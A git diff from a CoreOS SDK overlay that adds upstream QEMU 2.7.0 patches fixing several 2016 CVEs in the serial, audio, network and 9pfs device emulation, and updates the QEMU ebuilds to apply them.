b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-2.patch new file mode 100644 index 0000000000..23393b7d59 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-2.patch @@ -0,0 +1,34 @@ +From: Prasad J Pandit + +16550A UART device uses an oscillator to generate frequencies +(baud base), which decide communication speed. This speed could +be changed by dividing it by a divider. If the divider is +greater than the baud base, speed is set to zero, leading to a +divide by zero error. Add check to avoid it. + +Reported-by: Huawei PSIRT +Signed-off-by: Prasad J Pandit +--- + hw/char/serial.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +Update per + -> https://lists.gnu.org/archive/html/qemu-devel/2016-10/msg02400.html + +diff --git a/hw/char/serial.c b/hw/char/serial.c +index 3442f47..eec72b7 100644 +--- a/hw/char/serial.c ++++ b/hw/char/serial.c +@@ -153,8 +153,9 @@ static void serial_update_parameters(SerialState *s) + int speed, parity, data_bits, stop_bits, frame_size; + QEMUSerialSetParams ssp; + +- if (s->divider == 0) ++ if (s->divider == 0 || s->divider > s->baudbase) { + return; ++ } + + /* Start bit. */ + frame_size = 1; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8909.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8909.patch new file mode 100644 index 0000000000..ed6613f896 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8909.patch @@ -0,0 +1,31 @@ +From: Prasad J Pandit + +Intel HDA emulator uses stream of buffers during DMA data +transfers. Each entry has buffer length and buffer pointer +position, which are used to derive bytes to 'copy'. If this +length and buffer pointer were to be same, 'copy' could be +set to zero(0), leading to an infinite loop. Add check to +avoid it. + +Reported-by: Huawei PSIRT +Signed-off-by: Prasad J Pandit +--- + hw/audio/intel-hda.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/hw/audio/intel-hda.c b/hw/audio/intel-hda.c +index cd95340..537face 100644 +--- a/hw/audio/intel-hda.c ++++ b/hw/audio/intel-hda.c +@@ -416,7 +416,8 @@ static bool intel_hda_xfer(HDACodecDevice *dev, uint32_t stnr, bool output, + } + + left = len; +- while (left > 0) { ++ s = st->bentries; ++ while (left > 0 && s-- > 0) { + copy = left; + if (copy > st->bsize - st->lpib) + copy = st->bsize - st->lpib; +-- +2.7.4 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8910.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8910.patch new file mode 100644 index 0000000000..c93f79631f --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8910.patch @@ -0,0 +1,29 @@ +From: Prasad J Pandit + +RTL8139 ethernet controller in C+ mode supports multiple +descriptor rings, each with maximum of 64 descriptors. While +processing transmit descriptor ring in 'rtl8139_cplus_transmit', +it does not limit the descriptor count and runs forever. Add +check to avoid it. + +Reported-by: Andrew Henderson +Signed-off-by: Prasad J Pandit +--- + hw/net/rtl8139.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c +index 3345bc6..f05e59c 100644 +--- a/hw/net/rtl8139.c ++++ b/hw/net/rtl8139.c +@@ -2350,7 +2350,7 @@ static void rtl8139_cplus_transmit(RTL8139State *s) + { + int txcount = 0; + +- while (rtl8139_cplus_transmit_one(s)) ++ while (txcount < 64 && rtl8139_cplus_transmit_one(s)) + { + ++txcount; + } +-- +2.7.4 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9102.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9102.patch new file mode 100644 index 0000000000..963eca97f4 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9102.patch @@ -0,0 +1,21 @@ +From: Li Qiang + +The 'fs.xattr.value' field in V9fsFidState object doesn't consider the +situation that this field has been allocated previously. Every time, it +will be allocated directly. This leads a host memory leak issue. This +patch fix this. + +-- +1.8.3.1 +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 75ba5f1..a4c7109 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -3269,6 +3269,7 @@ static void v9fs_xattrcreate(void *opaque) + xattr_fidp->fs.xattr.flags = flags; + v9fs_string_init(&xattr_fidp->fs.xattr.name); + v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name); ++ g_free(xattr_fidp->fs.xattr.value); + xattr_fidp->fs.xattr.value = g_malloc(size); + err = offset; + put_fid(pdu, file_fidp); diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9103.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9103.patch new file mode 100644 index 0000000000..7520863a7d --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9103.patch @@ -0,0 +1,27 @@ +Author: Li Qiang +Date: Mon Oct 17 14:13:58 2016 +0200 + + 9pfs: fix information leak in xattr read + + 9pfs uses g_malloc() to allocate the xattr memory space, if the guest + reads this memory before writing to it, this will leak host heap memory + to the guest. This patch avoid this. + + Signed-off-by: Li Qiang + Reviewed-by: Greg Kurz + Signed-off-by: Greg Kurz + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 26aa7d5..bf23b01 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -3269,8 +3269,8 @@ static void coroutine_fn v9fs_xattrcreate(void *opaque) + xattr_fidp->fs.xattr.flags = flags; + v9fs_string_init(&xattr_fidp->fs.xattr.name); + v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name); + g_free(xattr_fidp->fs.xattr.value); +- xattr_fidp->fs.xattr.value = g_malloc(size); ++ xattr_fidp->fs.xattr.value = g_malloc0(size); + err = offset; + put_fid(pdu, file_fidp); + out_nofid: diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9104.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9104.patch new file mode 100644 index 0000000000..f1aec55c22 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9104.patch @@ -0,0 +1,92 @@ +From 7e55d65c56a03dcd2c5d7c49d37c5a74b55d4bd6 Mon Sep 17 00:00:00 2001 +From: Li Qiang +Date: Tue, 1 Nov 2016 12:00:40 +0100 +Subject: [PATCH] 9pfs: fix integer overflow issue in xattr read/write +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The v9fs_xattr_read() and v9fs_xattr_write() are passed a guest +originated offset: they must ensure this offset does not go beyond +the size of the extended attribute that was set in v9fs_xattrcreate(). +Unfortunately, the current code implement these checks with unsafe +calculations on 32 and 64 bit values, which may allow a malicious +guest to cause OOB access anyway. + +Fix this by comparing the offset and the xattr size, which are +both uint64_t, before trying to compute the effective number of bytes +to read or write. + +Suggested-by: Greg Kurz +Signed-off-by: Li Qiang +Reviewed-by: Greg Kurz +Reviewed-By: Guido Günther +Signed-off-by: Greg Kurz +--- + hw/9pfs/9p.c | 32 ++++++++++++-------------------- + 1 file changed, 12 insertions(+), 20 deletions(-) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index ab18ef2..7705ead 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -1637,20 +1637,17 @@ static int v9fs_xattr_read(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp, + { + ssize_t err; + size_t offset = 7; +- int read_count; +- int64_t xattr_len; ++ uint64_t read_count; + V9fsVirtioState *v = container_of(s, V9fsVirtioState, state); + VirtQueueElement *elem = v->elems[pdu->idx]; + +- xattr_len = fidp->fs.xattr.len; +- read_count = xattr_len - off; ++ if (fidp->fs.xattr.len < off) { ++ read_count = 0; ++ } else { ++ read_count = fidp->fs.xattr.len - off; ++ } + if (read_count > max_count) { + read_count = max_count; +- } else if (read_count < 0) { +- /* +- * read beyond XATTR value +- */ +- read_count = 0; + } + err = pdu_marshal(pdu, offset, "d", read_count); + if (err < 0) { +@@ -1979,23 +1976,18 @@ static int v9fs_xattr_write(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp, + { + int i, to_copy; + ssize_t err = 0; +- int write_count; +- int64_t xattr_len; ++ uint64_t write_count; + size_t offset = 7; + + +- xattr_len = fidp->fs.xattr.len; +- write_count = xattr_len - off; +- if (write_count > count) { +- write_count = count; +- } else if (write_count < 0) { +- /* +- * write beyond XATTR value len specified in +- * xattrcreate +- */ ++ if (fidp->fs.xattr.len < off) { + err = -ENOSPC; + goto out; + } ++ write_count = fidp->fs.xattr.len - off; ++ if (write_count > count) { ++ write_count = count; ++ } + err = pdu_marshal(pdu, offset, "d", write_count); + if (err < 0) { + return err; +-- +2.7.3 + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9105.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9105.patch new file mode 100644 index 0000000000..cddff97f70 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9105.patch @@ -0,0 +1,25 @@ +From: Li Qiang + +In v9fs_link dispatch function, it doesn't put the 'oldfidp' +fid object, this will make the 'oldfidp->ref' never reach to 0, +thus leading a memory leak issue. This patch fix this. + +Signed-off-by: Li Qiang +--- + hw/9pfs/9p.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 8b50bfb..29f8b7a 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -2413,6 +2413,7 @@ static void v9fs_link(void *opaque) + if (!err) { + err = offset; + } ++ put_fid(pdu, oldfidp); + out: + put_fid(pdu, dfidp); + out_nofid: +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9106.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9106.patch new file mode 100644 index 0000000000..137272d6b8 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9106.patch @@ -0,0 +1,27 @@ +Author: Li Qiang +Date: Mon Oct 17 14:13:58 2016 +0200 + + 9pfs: fix memory leak in v9fs_write + + If an error occurs when marshalling the transfer length to the guest, the + v9fs_write() function doesn't free an IO vector, thus leading to a memory + leak. This patch fixes the issue. + + Signed-off-by: Li Qiang + Reviewed-by: Greg Kurz + [groug, rephrased the changelog] + Signed-off-by: Greg Kurz + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index d43a552..e88cf25 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -2090,7 +2090,7 @@ static void coroutine_fn v9fs_write(void *opaque) + offset = 7; + err = pdu_marshal(pdu, offset, "d", total); + if (err < 0) { +- goto out; ++ goto out_qiov; + } + err += offset; + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0.ebuild b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0-r7.ebuild similarity index 91% rename from sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0.ebuild rename to sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0-r7.ebuild index 98ee886f9b..28a608304a 100644 --- a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0.ebuild +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0-r7.ebuild @@ -10,7 +10,7 @@ PYTHON_REQ_USE="ncurses,readline" PLOCALES="bg de_DE fr_FR hu it tr zh_CN" inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ - user udev fcaps readme.gentoo pax-utils l10n + user udev fcaps readme.gentoo-r1 pax-utils l10n if [[ ${PV} = *9999* ]]; then EGIT_REPO_URI="git://git.qemu.org/qemu.git" @@ -94,7 +94,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND} ) !gtk2? ( x11-libs/gtk+:3 - vte? ( x11-libs/vte:2.90 ) + vte? ( x11-libs/vte:2.91 ) ) ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) @@ -108,7 +108,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND} virtual/opengl media-libs/libepoxy[static-libs(+)] media-libs/mesa[static-libs(+)] - media-libs/mesa[egl,gles2] + media-libs/mesa[egl,gles2,gbm] ) png? ( media-libs/libpng:0=[static-libs(+)] ) pulseaudio? ( media-sound/pulseaudio ) @@ -334,7 +334,36 @@ src_prepare() { epatch "${FILESDIR}"/${PN}-2.5.0-cflags.patch epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch - epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch + + epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch # bug 591242 + epatch "${FILESDIR}"/${P}-CVE-2016-7155.patch # bug 593034 + epatch "${FILESDIR}"/${P}-CVE-2016-7156.patch # bug 593036 + epatch "${FILESDIR}"/${P}-CVE-2016-7157-1.patch # bug 593038 + epatch "${FILESDIR}"/${P}-CVE-2016-7157-2.patch # bug 593038 + epatch "${FILESDIR}"/${P}-CVE-2016-7170.patch # bug 593284 + epatch "${FILESDIR}"/${P}-CVE-2016-7421.patch # bug 593950 + epatch "${FILESDIR}"/${P}-CVE-2016-7422.patch # bug 593956 + epatch "${FILESDIR}"/${P}-CVE-2016-7423.patch # bug 594368 + epatch "${FILESDIR}"/${P}-CVE-2016-7466.patch # bug 594520 + epatch "${FILESDIR}"/${P}-CVE-2016-7907.patch # bug 596048 + epatch "${FILESDIR}"/${P}-CVE-2016-7908.patch # bug 596049 + epatch "${FILESDIR}"/${P}-CVE-2016-7909.patch # bug 596048 + epatch "${FILESDIR}"/${P}-CVE-2016-7994-1.patch # bug 596738 + epatch "${FILESDIR}"/${P}-CVE-2016-7994-2.patch # bug 596738 + epatch "${FILESDIR}"/${P}-CVE-2016-8576.patch # bug 596752 + epatch "${FILESDIR}"/${P}-CVE-2016-8577.patch # bug 596776 + epatch "${FILESDIR}"/${P}-CVE-2016-8578.patch # bug 596774 + epatch "${FILESDIR}"/${P}-CVE-2016-8668.patch # bug 597110 + epatch "${FILESDIR}"/${P}-CVE-2016-8669-1.patch # bug 597108 + epatch "${FILESDIR}"/${P}-CVE-2016-8669-2.patch # bug 597108 + epatch "${FILESDIR}"/${P}-CVE-2016-8909.patch # bug 598044 + epatch "${FILESDIR}"/${P}-CVE-2016-8910.patch # bug 598046 + epatch "${FILESDIR}"/${P}-CVE-2016-9102.patch # bug 598328 + epatch "${FILESDIR}"/${P}-CVE-2016-9103.patch # bug 598328 + epatch "${FILESDIR}"/${P}-CVE-2016-9104.patch # bug 598328 + epatch "${FILESDIR}"/${P}-CVE-2016-9105.patch # bug 598328 + epatch "${FILESDIR}"/${P}-CVE-2016-9106.patch # bug 598772 + # Fix ld and objcopy being called directly tc-export AR LD OBJCOPY diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-9999.ebuild b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-9999.ebuild index b00a365891..a33eb05c08 100644 --- a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-9999.ebuild +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-9999.ebuild @@ -9,7 +9,7 @@ PYTHON_REQ_USE="ncurses,readline" PLOCALES="bg de_DE fr_FR hu it tr zh_CN" inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ - user udev fcaps readme.gentoo pax-utils l10n + user udev fcaps readme.gentoo-r1 pax-utils l10n if [[ ${PV} = *9999* ]]; then EGIT_REPO_URI="git://git.qemu.org/qemu.git" @@ -93,7 +93,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND} ) !gtk2? ( x11-libs/gtk+:3 - vte? ( x11-libs/vte:2.90 ) + vte? ( x11-libs/vte:2.91 ) ) ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) @@ -107,7 +107,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND} virtual/opengl media-libs/libepoxy[static-libs(+)] media-libs/mesa[static-libs(+)] - media-libs/mesa[egl,gles2] + media-libs/mesa[egl,gles2,gbm] ) png? ( media-libs/libpng:0=[static-libs(+)] ) pulseaudio? ( media-sound/pulseaudio )